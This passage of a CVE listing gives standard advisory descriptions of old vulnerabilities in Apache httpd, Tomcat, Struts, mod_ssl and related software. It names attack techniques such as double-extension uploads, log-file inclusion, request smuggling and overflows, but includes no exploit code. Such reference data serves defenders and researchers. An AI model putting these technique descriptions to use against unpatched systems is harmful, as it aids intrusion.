9052| [CVE-2006-3070] write_ok.php in Zeroboard 4.1 pl8, when installed on Apache with mod_mime, allows remote attackers to bypass restrictions for uploading files with executable extensions by uploading a .htaccess file that with an AddType directive that assigns an executable module to files with assumed-safe extensions, as demonstrated by assigning the txt extension to be handled by application/x-httpd-php.
9053| [CVE-2006-2831] Drupal 4.6.x before 4.6.8 and 4.7.x before 4.7.2, when running under certain Apache configurations such as when FileInfo overrides are disabled within .htaccess, allows remote attackers to execute arbitrary code by uploading a file with multiple extensions, a variant of CVE-2006-2743.
9054| [CVE-2006-2806] The SMTP server in Apache Java Mail Enterprise Server (aka Apache James) 2.2.0 allows remote attackers to cause a denial of service (CPU consumption) via a long argument to the MAIL command.
9055| [CVE-2006-2743] Drupal 4.6.x before 4.6.7 and 4.7.0, when running on Apache with mod_mime, does not properly handle files with multiple extensions, which allows remote attackers to upload, modify, or execute arbitrary files in the files directory.
9056| [CVE-2006-2514] Coppermine galleries before 1.4.6, when running on Apache with mod_mime installed, allows remote attackers to upload arbitrary files via a filename with multiple file extensions.
9057| [CVE-2006-2330] PHP-Fusion 6.00.306 and earlier, running under Apache HTTP Server 1.3.27 and PHP 4.3.3, allows remote authenticated users to upload files of arbitrary types using a filename that contains two or more extensions that ends in an assumed-valid extension such as .gif, which bypasses the validation, as demonstrated by uploading then executing an avatar file that ends in ".php.gif" and contains PHP code in EXIF metadata.
9058| [CVE-2006-1777] Directory traversal vulnerability in doc/index.php in Jeremy Ashcraft Simplog 0.9.2 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the s parameter, as demonstrated by injecting PHP sequences into an Apache error_log file, which is then included by doc/index.php.
9059| [CVE-2006-1564] Untrusted search path vulnerability in libapache2-svn 1.3.0-4 for Subversion in Debian GNU/Linux includes RPATH values under the /tmp/svn directory for the (1) mod_authz_svn.so and (2) mod_dav_svn.so modules, which might allow local users to gain privileges by installing malicious libraries in that directory.
9060| [CVE-2006-1548] Cross-site scripting (XSS) vulnerability in (1) LookupDispatchAction and possibly (2) DispatchAction and (3) ActionDispatcher in Apache Software Foundation (ASF) Struts before 1.2.9 allows remote attackers to inject arbitrary web script or HTML via the parameter name, which is not filtered in the resulting error message.
9061| [CVE-2006-1547] ActionForm in Apache Software Foundation (ASF) Struts before 1.2.9 with BeanUtils 1.7 allows remote attackers to cause a denial of service via a multipart/form-data encoded form with a parameter name that references the public getMultipartRequestHandler method, which provides further access to elements in the CommonsMultipartRequestHandler implementation and BeanUtils.
9062| [CVE-2006-1546] Apache Software Foundation (ASF) Struts before 1.2.9 allows remote attackers to bypass validation via a request with a 'org.apache.struts.taglib.html.Constants.CANCEL' parameter, which causes the action to be canceled but would not be detected from applications that do not use the isCancelled check.
9063| [CVE-2006-1393] Multiple cross-site scripting (XSS) vulnerabilities in the mod_pubcookie Apache application server module in University of Washington Pubcookie 1.x, 3.0.0, 3.1.0, 3.1.1, 3.2 before 3.2.1b, and 3.3 before 3.3.0a allow remote attackers to inject arbitrary web script or HTML via unspecified attack vectors.
9064| [CVE-2006-1346] Directory traversal vulnerability in inc/setLang.php in Greg Neustaetter gCards 1.45 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences in a lang[*][file] parameter, as demonstrated by injecting PHP sequences into an Apache access_log file, which is then included by index.php.
9065| [CVE-2006-1292] Directory traversal vulnerability in Jim Hu and Chad Little PHP iCalendar 2.21 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences and a NUL (%00) character in the phpicalendar[cookie_language] and phpicalendar[cookie_style] cookies, as demonstrated by injecting PHP sequences into an Apache access_log file, which is then included by day.php.
9066| [CVE-2006-1243] Directory traversal vulnerability in install05.php in Simple PHP Blog (SPB) 0.4.7.1 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences and a NUL (%00) character in the blog_language parameter, as demonstrated by injecting PHP sequences into an Apache access_log file, which is then included using install05.php.
9067| [CVE-2006-1095] Directory traversal vulnerability in the FileSession object in Mod_python module 3.2.7 for Apache allows local users to execute arbitrary code via a crafted session cookie.
9068| [CVE-2006-1079] htpasswd, as used in Acme thttpd 2.25b and possibly other products such as Apache, might allow local users to gain privileges via shell metacharacters in a command line argument, which is used in a call to the system function. NOTE: since htpasswd is normally installed as a non-setuid program, and the exploit is through command line options, perhaps this issue should not be included in CVE. However, if there are some typical or recommended configurations that use htpasswd with sudo privileges, or common products that access htpasswd remotely, then perhaps it should be included.
9069| [CVE-2006-1078] Multiple buffer overflows in htpasswd, as used in Acme thttpd 2.25b, and possibly other products such as Apache, might allow local users to gain privileges via (1) a long command line argument and (2) a long line in a file. NOTE: since htpasswd is normally installed as a non-setuid program, and the exploit is through command line options, perhaps this issue should not be included in CVE. However, if there are some typical or recommended configurations that use htpasswd with sudo privileges, or common products that access htpasswd remotely, then perhaps it should be included.
9070| [CVE-2006-0743] Format string vulnerability in LocalSyslogAppender in Apache log4net 1.2.9 might allow remote attackers to cause a denial of service (memory corruption and termination) via unknown vectors.
9071| [CVE-2006-0254] Multiple cross-site scripting (XSS) vulnerabilities in Apache Geronimo 1.0 allow remote attackers to inject arbitrary web script or HTML via the (1) time parameter to cal2.jsp and (2) any invalid parameter, which causes an XSS when the log file is viewed by the Web-Access-Log viewer.
9072| [CVE-2006-0150] Multiple format string vulnerabilities in the auth_ldap_log_reason function in Apache auth_ldap 1.6.0 and earlier allows remote attackers to execute arbitrary code via various vectors, including the username.
9073| [CVE-2006-0144] The proxy server feature in go-pear.php in PHP PEAR 0.2.2, as used in Apache2Triad, allows remote attackers to execute arbitrary PHP code by redirecting go-pear.php to a malicious proxy server that provides a modified version of Tar.php with a malicious extractModify function.
9074| [CVE-2006-0042] Unspecified vulnerability in (1) apreq_parse_headers and (2) apreq_parse_urlencoded functions in Apache2::Request (Libapreq2) before 2.07 allows remote attackers cause a denial of service (CPU consumption) via unknown attack vectors that result in quadratic computational complexity.
9075| [CVE-2005-4857] eZ publish 3.5 before 3.5.7, 3.6 before 3.6.5, 3.7 before 3.7.3, and 3.8 before 20051128 allows remote authenticated users to cause a denial of service (Apache httpd segmentation fault) via a request to content/advancedsearch.php with an empty SearchContentClassID parameter, reportedly related to a "memory addressing error".
9076| [CVE-2005-4849] Apache Derby before 10.1.2.1 exposes the (1) user and (2) password attributes in cleartext via (a) the RDBNAM parameter of the ACCSEC command and (b) the output of the DatabaseMetaData.getURL function, which allows context-dependent attackers to obtain sensitive information.
9077| [CVE-2005-4836] The HTTP/1.1 connector in Apache Tomcat 4.1.15 through 4.1.40 does not reject NULL bytes in a URL when allowLinking is configured, which allows remote attackers to read JSP source files and obtain sensitive information.
9078| [CVE-2005-4814] Unrestricted file upload vulnerability in Segue CMS before 1.3.6, when the Apache HTTP Server handles .phtml files with the PHP interpreter, allows remote attackers to upload and execute arbitrary PHP code by placing .phtml files in the userfiles/ directory.
9079| [CVE-2005-4703] Apache Tomcat 4.0.3, when running on Windows, allows remote attackers to obtain sensitive information via a request for a file that contains an MS-DOS device name such as lpt9, which leaks the pathname in an error message, as demonstrated by lpt9.xtp using Nikto.
9080| [CVE-2005-3745] Cross-site scripting (XSS) vulnerability in Apache Struts 1.2.7, and possibly other versions allows remote attackers to inject arbitrary web script or HTML via the query string, which is not properly quoted or filtered when the request handler generates an error message.
9081| [CVE-2005-3630] Fedora Directory Server before 10 allows remote attackers to obtain sensitive information, such as the password from adm.conf via an IFRAME element, probably involving an Apache httpd.conf configuration that orders "allow" directives before "deny" directives.
9082| [CVE-2005-3510] Apache Tomcat 5.5.0 to 5.5.11 allows remote attackers to cause a denial of service (CPU consumption) via a large number of simultaneous requests to list a web directory that has a large number of files.
9083| [CVE-2005-3392] Unspecified vulnerability in PHP before 4.4.1, when using the virtual function on Apache 2, allows remote attackers to bypass safe_mode and open_basedir directives.
9084| [CVE-2005-3357] mod_ssl in Apache 2.0 up to 2.0.55, when configured with an SSL vhost with access control and a custom error 400 error page, allows remote attackers to cause a denial of service (application crash) via a non-SSL request to an SSL port, which triggers a NULL pointer dereference.
9085| [CVE-2005-3352] Cross-site scripting (XSS) vulnerability in the mod_imap module of Apache httpd before 1.3.35-dev and Apache httpd 2.0.x before 2.0.56-dev allows remote attackers to inject arbitrary web script or HTML via the Referer when using image maps.
9086| [CVE-2005-3319] The apache2handler SAPI (sapi_apache2.c) in the Apache module (mod_php) for PHP 5.x before 5.1.0 final and 4.4 before 4.4.1 final allows attackers to cause a denial of service (segmentation fault) via the session.save_path option in a .htaccess file or VirtualHost.
9087| [CVE-2005-3164] The AJP connector in Apache Tomcat 4.0.1 through 4.0.6 and 4.1.0 through 4.1.36, as used in Hitachi Cosminexus Application Server and standalone, does not properly handle when a connection is broken before request body data is sent in a POST request, which can lead to an information leak when "unsuitable request body data" is used for a different request, possibly related to Java Servlet pages.
9088| [CVE-2005-2970] Memory leak in the worker MPM (worker.c) for Apache 2, in certain circumstances, allows remote attackers to cause a denial of service (memory consumption) via aborted connections, which prevents the memory for the transaction pool from being reused for other connections.
9089| [CVE-2005-2963] The mod_auth_shadow module 1.0 through 1.5 and 2.0 for Apache with AuthShadow enabled uses shadow authentication for all locations that use the require group directive, even when other authentication mechanisms are specified, which might allow remote authenticated users to bypass security restrictions.
9090| [CVE-2005-2728] The byte-range filter in Apache 2.0 before 2.0.54 allows remote attackers to cause a denial of service (memory consumption) via an HTTP header with a large Range field.
9091| [CVE-2005-2660] apachetop 0.12.5 and earlier, when running in debug mode, allows local users to create or append to arbitrary files via a symlink attack on atop.debug.
9092| [CVE-2005-2088] The Apache HTTP server before 1.3.34, and 2.0.x before 2.0.55, when acting as an HTTP proxy, allows remote attackers to poison the web cache, bypass web application firewall protection, and conduct XSS attacks via an HTTP request with both a "Transfer-Encoding: chunked" header and a Content-Length header, which causes Apache to incorrectly handle and forward the body of the request in a way that causes the receiving server to process it as a separate HTTP request, aka "HTTP Request Smuggling."
9093| [CVE-2005-1754] ** DISPUTED ** JavaMail API 1.1.3 through 1.3, as used by Apache Tomcat 5.0.16, allows remote attackers to read arbitrary files via a full pathname in the argument to the Download parameter. NOTE: Sun and Apache dispute this issue. Sun states: "The report makes references to source code and files that do not exist in the mentioned products."
9094| [CVE-2005-1753] ** DISPUTED ** ReadMessage.jsp in JavaMail API 1.1.3 through 1.3, as used by Apache Tomcat 5.0.16, allows remote attackers to view other users' e-mail attachments via a direct request to /mailboxesdir/username@domainname. NOTE: Sun and Apache dispute this issue. Sun states: "The report makes references to source code and files that do not exist in the mentioned products."
9095| [CVE-2005-1344] Buffer overflow in htdigest in Apache 2.0.52 may allow attackers to execute arbitrary code via a long realm argument. NOTE: since htdigest is normally only locally accessible and not setuid or setgid, there are few attack vectors which would lead to an escalation of privileges, unless htdigest is executed from a CGI program. Therefore this may not be a vulnerability.
9096| [CVE-2005-1268] Off-by-one error in the mod_ssl Certificate Revocation List (CRL) verification callback in Apache, when configured to use a CRL, allows remote attackers to cause a denial of service (child process crash) via a CRL that causes a buffer overflow of one null byte.
9097| [CVE-2005-1266] Apache SpamAssassin 3.0.1, 3.0.2, and 3.0.3 allows remote attackers to cause a denial of service (CPU consumption and slowdown) via a message with a long Content-Type header without any boundaries.
9098| [CVE-2005-0808] Apache Tomcat before 5.x allows remote attackers to cause a denial of service (application crash) via a crafted AJP12 packet to TCP port 8007.
9099| [CVE-2005-0182] The mod_dosevasive module 1.9 and earlier for Apache creates temporary files with predictable filenames, which could allow remote attackers to overwrite arbitrary files via a symlink attack.
9100| [CVE-2005-0108] Apache mod_auth_radius 1.5.4 and libpam-radius-auth allow remote malicious RADIUS servers to cause a denial of service (crash) via a RADIUS_REPLY_MESSAGE with a RADIUS attribute length of 1, which leads to a memcpy operation with a -1 length argument.
9101| [CVE-2004-2734] webadmin-apache.conf in Novell Web Manager of Novell NetWare 6.5 uses an uppercase Alias tag with an inconsistent lowercase directory tag for a volume, which allows remote attackers to bypass access control to the WEB-INF folder.
9102| [CVE-2004-2680] mod_python (libapache2-mod-python) 3.1.4 and earlier does not properly handle when output filters process more than 16384 bytes, which can cause filter.read to return portions of previously freed memory.
9103| [CVE-2004-2650] Spooler in Apache Foundation James 2.2.0 allows local users to cause a denial of service (memory consumption) by triggering various error conditions in the retrieve function, which prevents a lock from being released and causes a memory leak.
9104| [CVE-2004-2343] ** DISPUTED ** Apache HTTP Server 2.0.47 and earlier allows local users to bypass .htaccess file restrictions, as specified in httpd.conf with directives such as Deny From All, by using an ErrorDocument directive. NOTE: the vendor has disputed this issue, since the .htaccess mechanism is only intended to restrict external web access, and a local user already has the privileges to perform the same operations without using ErrorDocument.
9105| [CVE-2004-2336] Unknown vulnerability in Novell GroupWise and GroupWise WebAccess 6.0 through 6.5, when running with Apache Web Server 1.3 for NetWare where Apache is loaded using GWAPACHE.CONF, allows remote attackers to read directories and files on the server.
9106| [CVE-2004-2115] Multiple cross-site scripting (XSS) vulnerabilities in Oracle HTTP Server 1.3.22, based on Apache, allow remote attackers to execute arbitrary script as other users via the (1) action, (2) username, or (3) password parameters in an isqlplus request.
9107| [CVE-2004-1834] mod_disk_cache in Apache 2.0 through 2.0.49 stores client headers, including authentication information, on the hard disk, which could allow local users to gain sensitive information.
9108| [CVE-2004-1765] Off-by-one buffer overflow in ModSecurity (mod_security) 1.7.4 for Apache 2.x, when SecFilterScanPost is enabled, allows remote attackers to execute arbitrary code via crafted POST requests.
9109| [CVE-2004-1545] UploadFile.php in MoniWiki 1.0.9.2 and earlier, when used with Apache mod_mime, does not properly handle files with two file extensions, such as .php.hwp, which allows remote attackers to upload and execute arbitrary code.
9110| [CVE-2004-1438] The mod_authz_svn Apache module for Subversion 1.0.4-r1 and earlier allows remote authenticated users, with write access to the repository, to read unauthorized parts of the repository via the svn copy command.
9111| [CVE-2004-1405] MediaWiki 1.3.8 and earlier, when used with Apache mod_mime, does not properly handle files with two file extensions, such as .php.rar, which allows remote attackers to upload and execute arbitrary code.
9112| [CVE-2004-1404] Attachment Mod 2.3.10 module for phpBB, when used with Apache mod_mime, does not properly handle files with multiple file extensions, such as .php.rar, which allows remote attackers to upload and execute arbitrary code.
9113| [CVE-2004-1387] The check_forensic script in apache-utils package 1.3.31 allows local users to overwrite or create arbitrary files via a symlink attack on temporary files.
9114| [CVE-2004-1084] Apache for Apple Mac OS X 10.2.8 and 10.3.6 allows remote attackers to read files and resource fork content via HTTP requests to certain special file names related to multiple data streams in HFS+, which bypass Apache file handles.
9115| [CVE-2004-1083] Apache for Apple Mac OS X 10.2.8 and 10.3.6 restricts access to files in a case sensitive manner, but the Apple HFS+ filesystem accesses files in a case insensitive manner, which allows remote attackers to read .DS_Store files and files beginning with ".ht" using alternate capitalization.
9116| [CVE-2004-1082] mod_digest_apple for Apache 1.3.31 and 1.3.32 on Mac OS X Server does not properly verify the nonce of a client response, which allows remote attackers to replay credentials.
9117| [CVE-2004-0942] Apache webserver 2.0.52 and earlier allows remote attackers to cause a denial of service (CPU consumption) via an HTTP GET request with a MIME header containing multiple lines with a large number of space characters.
9118| [CVE-2004-0940] Buffer overflow in the get_tag function in mod_include for Apache 1.3.x to 1.3.32 allows local users who can create SSI documents to execute arbitrary code as the apache user via SSI (XSSI) documents that trigger a length calculation error.
9119| [CVE-2004-0885] The mod_ssl module in Apache 2.0.35 through 2.0.52, when using the "SSLCipherSuite" directive in directory or location context, allows remote clients to bypass intended restrictions by using any cipher suite that is allowed by the virtual host configuration.
9120| [CVE-2004-0811] Unknown vulnerability in Apache 2.0.51 prevents "the merging of the Satisfy directive," which could allow attackers to obtain access to restricted resources contrary to the specified authentication configuration.
9121| [CVE-2004-0809] The mod_dav module in Apache 2.0.50 and earlier allows remote attackers to cause a denial of service (child process crash) via a certain sequence of LOCK requests for a location that allows WebDAV authoring access.
9122| [CVE-2004-0786] The IPv6 URI parsing routines in the apr-util library for Apache 2.0.50 and earlier allow remote attackers to cause a denial of service (child process crash) via a certain URI, as demonstrated using the Codenomicon HTTP Test Tool.
9123| [CVE-2004-0751] The char_buffer_read function in the mod_ssl module for Apache 2.x, when using reverse proxying to an SSL server, allows remote attackers to cause a denial of service (segmentation fault).
9124| [CVE-2004-0748] mod_ssl in Apache 2.0.50 and earlier allows remote attackers to cause a denial of service (CPU consumption) by aborting an SSL connection in a way that causes an Apache child process to enter an infinite loop.
9125| [CVE-2004-0747] Buffer overflow in Apache 2.0.50 and earlier allows local users to gain apache privileges via a .htaccess file that causes the overflow during expansion of environment variables.
9126| [CVE-2004-0700] Format string vulnerability in the mod_proxy hook functions function in ssl_engine_log.c in mod_ssl before 2.8.19 for Apache before 1.3.31 may allow remote attackers to execute arbitrary messages via format string specifiers in certain log messages for HTTPS that are handled by the ssl_log function.
9127| [CVE-2004-0646] Buffer overflow in the WriteToLog function for JRun 3.0 through 4.0 web server connectors, such as (1) mod_jrun and (2) mod_jrun20 for Apache, with verbose logging enabled, allows remote attackers to execute arbitrary code via a long HTTP header Content-Type field or other fields.
9128| [CVE-2004-0529] The modified suexec program in cPanel, when configured for mod_php and compiled for Apache 1.3.31 and earlier without mod_phpsuexec, allows local users to execute untrusted shared scripts and gain privileges, as demonstrated using untainted scripts such as (1) proftpdvhosts or (2) addalink.cgi, a different vulnerability than CVE-2004-0490.
9129| [CVE-2004-0493] The ap_get_mime_headers_core function in Apache httpd 2.0.49 allows remote attackers to cause a denial of service (memory exhaustion), and possibly an integer signedness error leading to a heap-based buffer overflow on 64 bit systems, via long header lines with large numbers of space or tab characters.
9130| [CVE-2004-0492] Heap-based buffer overflow in proxy_util.c for mod_proxy in Apache 1.3.25 to 1.3.31 allows remote attackers to cause a denial of service (process crash) and possibly execute arbitrary code via a negative Content-Length HTTP header field, which causes a large amount of data to be copied.
9131| [CVE-2004-0490] cPanel, when compiling Apache 1.3.29 and PHP with the mod_phpsuexec option, does not set the --enable-discard-path option, which causes php to use the SCRIPT_FILENAME variable to find and execute a script instead of the PATH_TRANSLATED variable, which allows local users to execute arbitrary PHP code as other users via a URL that references the attacker's script after the user's script, which executes the attacker's script with the user's privileges, a different vulnerability than CVE-2004-0529.
9132| [CVE-2004-0488] Stack-based buffer overflow in the ssl_util_uuencode_binary function in ssl_util.c for Apache mod_ssl, when mod_ssl is configured to trust the issuing CA, may allow remote attackers to execute arbitrary code via a client certificate with a long subject DN.
9133| [CVE-2004-0263] PHP 4.3.4 and earlier in Apache 1.x and 2.x (mod_php) can leak global variables between virtual hosts that are handled by the same Apache child process but have different settings, which could allow remote attackers to obtain sensitive information.
9134| [CVE-2004-0174] Apache 1.4.x before 1.3.30, and 2.0.x before 2.0.49, when using multiple listening sockets on certain platforms, allows remote attackers to cause a denial of service (blocked new connections) via a "short-lived connection on a rarely-accessed listening socket."
9135| [CVE-2004-0173] Directory traversal vulnerability in Apache 1.3.29 and earlier, and Apache 2.0.48 and earlier, when running on Cygwin, allows remote attackers to read arbitrary files via a URL containing "..%5C" (dot dot encoded backslash) sequences.
9136| [CVE-2004-0113] Memory leak in ssl_engine_io.c for mod_ssl in Apache 2 before 2.0.49 allows remote attackers to cause a denial of service (memory consumption) via plain HTTP requests to the SSL port of an SSL-enabled server.
9137| [CVE-2004-0009] Apache-SSL 1.3.28+1.52 and earlier, with SSLVerifyClient set to 1 or 3 and SSLFakeBasicAuth enabled, allows remote attackers to forge a client certificate by using basic authentication with the "one-line DN" of the target user.
9138| [CVE-2003-1581] The Apache HTTP Server 2.0.44, when DNS resolution is enabled for client IP addresses, allows remote attackers to inject arbitrary text into log files via an HTTP request in conjunction with a crafted DNS response, as demonstrated by injecting XSS sequences, related to an "Inverse Lookup Log Corruption (ILLC)" issue.
9139| [CVE-2003-1580] The Apache HTTP Server 2.0.44, when DNS resolution is enabled for client IP addresses, uses a logging format that does not identify whether a dotted quad represents an unresolved IP address, which allows remote attackers to spoof IP addresses via crafted DNS responses containing numerical top-level domains, as demonstrated by a forged 123.123.123.123 domain name, related to an "Inverse Lookup Log Corruption (ILLC)" issue.
9140| [CVE-2003-1573] The PointBase 4.6 database component in the J2EE 1.4 reference implementation (J2EE/RI) allows remote attackers to execute arbitrary programs, conduct a denial of service, and obtain sensitive information via a crafted SQL statement, related to "inadequate security settings and library bugs in sun.* and org.apache.* packages."
9141| [CVE-2003-1521] Sun Java Plug-In 1.4 through 1.4.2_02 allows remote attackers to repeatedly access the floppy drive via the createXmlDocument method in the org.apache.crimson.tree.XmlDocument class, which violates the Java security model.
9142| [CVE-2003-1516] The org.apache.xalan.processor.XSLProcessorVersion class in Java Plug-in 1.4.2_01 allows signed and unsigned applets to share variables, which violates the Java security model and could allow remote attackers to read or write data belonging to a signed applet.
9143| [CVE-2003-1502] mod_throttle 3.0 allows local users with Apache privileges to access shared memory that points to a file that is writable by the apache user, which could allow local users to gain privileges.
9144| [CVE-2003-1418] Apache HTTP Server 1.3.22 through 1.3.27 on OpenBSD allows remote attackers to obtain sensitive information via (1) the ETag header, which reveals the inode number, or (2) multipart MIME boundary, which reveals child proccess IDs (PID).
9145| [CVE-2003-1307] ** DISPUTED ** The mod_php module for the Apache HTTP Server allows local users with write access to PHP scripts to send signals to the server's process group and use the server's file descriptors, as demonstrated by sending a STOP signal, then intercepting incoming connections on the server's TCP port. NOTE: the PHP developer has disputed this vulnerability, saying "The opened file descriptors are opened by Apache. It is the job of Apache to protect them ... Not a bug in PHP."
9146| [CVE-2003-1172] Directory traversal vulnerability in the view-source sample file in Apache Software Foundation Cocoon 2.1 and 2.2 allows remote attackers to access arbitrary files via a .. (dot dot) in the filename parameter.
9147| [CVE-2003-1171] Heap-based buffer overflow in the sec_filter_out function in mod_security 1.7RC1 through 1.7.1 in Apache 2 allows remote attackers to execute arbitrary code via a server side script that sends a large amount of data.
9148| [CVE-2003-1138] The default configuration of Apache 2.0.40, as shipped with Red Hat Linux 9.0, allows remote attackers to list directory contents, even if auto indexing is turned off and there is a default web page configured, via a GET request containing a double slash (//).
9149| [CVE-2003-1054] mod_access_referer 1.0.2 allows remote attackers to cause a denial of service (crash) via a malformed Referer header that is missing a hostname, as parsed by the ap_parse_uri_components function in Apache, which triggers a null dereference.
9150| [CVE-2003-0993] mod_access in Apache 1.3 before 1.3.30, when running big-endian 64-bit platforms, does not properly parse Allow/Deny rules using IP addresses without a netmask, which could allow remote attackers to bypass intended access restrictions.
9151| [CVE-2003-0987] mod_digest for Apache before 1.3.31 does not properly verify the nonce of a client response by using a AuthNonce secret.
9152| [CVE-2003-0866] The Catalina org.apache.catalina.connector.http package in Tomcat 4.0.x up to 4.0.3 allows remote attackers to cause a denial of service via several requests that do not follow the HTTP protocol, which causes Tomcat to reject later requests.
9153| [CVE-2003-0844] mod_gzip 1.3.26.1a and earlier, and possibly later official versions, when running in debug mode without the Apache log, allows local users to overwrite arbitrary files via (1) a symlink attack on predictable temporary filenames on Unix systems, or (2) an NTFS hard link on Windows systems when the "Strengthen default permissions of internal system objects" policy is not enabled.
9154| [CVE-2003-0843] Format string vulnerability in mod_gzip_printf for mod_gzip 1.3.26.1a and earlier, and possibly later official versions, when running in debug mode and using the Apache log, allows remote attackers to execute arbitrary code via format string characters in an HTTP GET request with an "Accept-Encoding: gzip" header.
9155| [CVE-2003-0789] mod_cgid in Apache before 2.0.48, when using a threaded MPM, does not properly handle CGI redirect paths, which could cause Apache to send the output of a CGI program to the wrong client.
9156| [CVE-2003-0771] Gallery.pm in Apache::Gallery (aka A::G) uses predictable temporary filenames when running Inline::C, which allows local users to execute arbitrary code by creating and modifying the files before Apache::Gallery does.
9157| [CVE-2003-0658] Docview before 1.1-18 in Caldera OpenLinux 3.1.1, SCO Linux 4.0, OpenServer 5.0.7, configures the Apache web server in a way that allows remote attackers to read arbitrary publicly readable files via a certain URL, possibly related to rewrite rules.
9158| [CVE-2003-0542] Multiple stack-based buffer overflows in (1) mod_alias and (2) mod_rewrite for Apache before 1.3.29 allow attackers to create configuration files to cause a denial of service (crash) or execute arbitrary code via a regular expression with more than 9 captures.
9159| [CVE-2003-0460] The rotatelogs program on Apache before 1.3.28, for Windows and OS/2 systems, does not properly ignore certain control characters that are received over the pipe, which could allow remote attackers to cause a denial of service.
9160| [CVE-2003-0254] Apache 2 before 2.0.47, when running on an IPv6 host, allows attackers to cause a denial of service (CPU consumption by infinite loop) when the FTP proxy server fails to create an IPv6 socket.
9161| [CVE-2003-0253] The prefork MPM in Apache 2 before 2.0.47 does not properly handle certain errors from accept, which could lead to a denial of service.
9162| [CVE-2003-0249] ** DISPUTED ** PHP treats unknown methods such as "PoSt" as a GET request, which could allow attackers to intended access restrictions if PHP is running on a server that passes on all methods, such as Apache httpd 2.0, as demonstrated using a Limit directive. NOTE: this issue has been disputed by the Apache security team, saying "It is by design that PHP allows scripts to process any request method. A script which does not explicitly verify the request method will hence be processed as normal for arbitrary methods. It is therefore expected behaviour that one cannot implement per-method access control using the Apache configuration alone, which is the assumption made in this report."
9163| [CVE-2003-0245] Vulnerability in the apr_psprintf function in the Apache Portable Runtime (APR) library for Apache 2.0.37 through 2.0.45 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via long strings, as demonstrated using XML objects to mod_dav, and possibly other vectors.
9164| [CVE-2003-0192] Apache 2 before 2.0.47, and certain versions of mod_ssl for Apache 1.3, do not properly handle "certain sequences of per-directory renegotiations and the SSLCipherSuite directive being used to upgrade from a weak ciphersuite to a strong one," which could cause Apache to use the weak ciphersuite.
9165| [CVE-2003-0189] The authentication module for Apache 2.0.40 through 2.0.45 on Unix does not properly handle threads safely when using the crypt_r or crypt functions, which allows remote attackers to cause a denial of service (failed Basic authentication with valid usernames and passwords) when a threaded MPM is used.
9166| [CVE-2003-0134] Unknown vulnerability in filestat.c for Apache running on OS2, versions 2.0 through 2.0.45, allows unknown attackers to cause a denial of service via requests related to device names.
9167| [CVE-2003-0132] A memory leak in Apache 2.0 through 2.0.44 allows remote attackers to cause a denial of service (memory consumption) via large chunks of linefeed characters, which causes Apache to allocate 80 bytes for each linefeed.
9168| [CVE-2003-0083] Apache 1.3 before 1.3.25 and Apache 2.0 before version 2.0.46 does not filter terminal escape sequences from its access logs, which could make it easier for attackers to insert those sequences into terminal emulators containing vulnerabilities related to escape sequences, a different vulnerability than CVE-2003-0020.
9169| [CVE-2003-0020] Apache does not filter terminal escape sequences from its error logs, which could make it easier for attackers to insert those sequences into terminal emulators containing vulnerabilities related to escape sequences.
9170| [CVE-2003-0017] Apache 2.0 before 2.0.44 on Windows platforms allows remote attackers to obtain certain files via an HTTP request that ends in certain illegal characters such as ">", which causes a different filename to be processed and served.
9171| [CVE-2003-0016] Apache before 2.0.44, when running on unpatched Windows 9x and Me operating systems, allows remote attackers to cause a denial of service or execute arbitrary code via an HTTP request containing MS-DOS device names.
9172| [CVE-2002-2310] ClickCartPro 4.0 stores the admin_user.db data file under the web document root with insufficient access control on servers other than Apache, which allows remote attackers to obtain usernames and passwords.
9173| [CVE-2002-2309] php.exe in PHP 3.0 through 4.2.2, when running on Apache, does not terminate properly, which allows remote attackers to cause a denial of service via a direct request without arguments.
9174| [CVE-2002-2272] Tomcat 4.0 through 4.1.12, using mod_jk 1.2.1 module on Apache 1.3 through 1.3.27, allows remote attackers to cause a denial of service (desynchronized communications) via an HTTP GET request with a Transfer-Encoding chunked field with invalid values.
9175| [CVE-2002-2103] Apache before 1.3.24, when writing to the log file, records a spoofed hostname from the reverse lookup of an IP address, even when a double-reverse lookup fails, which allows remote attackers to hide the original source of activities.
9176| [CVE-2002-2029] PHP, when installed on Windows with Apache and ScriptAlias for /php/ set to c:/php/, allows remote attackers to read arbitrary files and possibly execute arbitrary programs via an HTTP request for php.exe with a filename in the query string.
9177| [CVE-2002-2012] Unknown vulnerability in Apache 1.3.19 running on HP Secure OS for Linux 1.0 allows remote attackers to cause "unexpected results" via an HTTP request.
9178| [CVE-2002-2009] Apache Tomcat 4.0.1 allows remote attackers to obtain the web root path via HTTP requests for JSP files preceded by (1) +/, (2) >/, (3) </, and (4) %20/, which leaks the pathname in an error message.
9179| [CVE-2002-2008] Apache Tomcat 4.0.3 for Windows allows remote attackers to obtain the web root path via an HTTP request for a resource that does not exist, such as lpt9, which leaks the information in an error message.
9180| [CVE-2002-2007] The default installations of Apache Tomcat 3.2.3 and 3.2.4 allows remote attackers to obtain sensitive system information such as directory listings and web root path, via erroneous HTTP requests for Java Server Pages (JSP) in the (1) test/jsp, (2) samples/jsp and (3) examples/jsp directories, or the (4) test/realPath.jsp servlet, which leaks pathnames in error messages.
9181| [CVE-2002-2006] The default installation of Apache Tomcat 4.0 through 4.1 and 3.0 through 3.3.1 allows remote attackers to obtain the installation path and other sensitive system information via the (1) SnoopServlet or (2) TroubleShooter example servlets.
9182| [CVE-2002-1895] The servlet engine in Jakarta Apache Tomcat 3.3 and 4.0.4, when using IIS and the ajp1.3 connector, allows remote attackers to cause a denial of service (crash) via a large number of HTTP GET requests for an MS-DOS device such as AUX, LPT1, CON, or PRN.
9183| [CVE-2002-1850] mod_cgi in Apache 2.0.39 and 2.0.40 allows local users and possibly remote attackers to cause a denial of service (hang and memory consumption) by causing a CGI script to send a large amount of data to stderr, which results in a read/write deadlock between httpd and the CGI script.
9184| [CVE-2002-1793] HTTP Server mod_ssl module running on HP-UX 11.04 with Virtualvault OS (VVOS) 4.5 through 4.6 closes the connection when the Apache server times out during an SSL request, which may allow attackers to cause a denial of service.
9185| [CVE-2002-1658] Buffer overflow in htdigest in Apache 1.3.26 and 1.3.27 may allow attackers to execute arbitrary code via a long user argument. NOTE: since htdigest is normally only locally accessible and not setuid or setgid, there are few attack vectors which would lead to an escalation of privileges, unless htdigest is executed from a CGI program. Therefore this may not be a vulnerability.
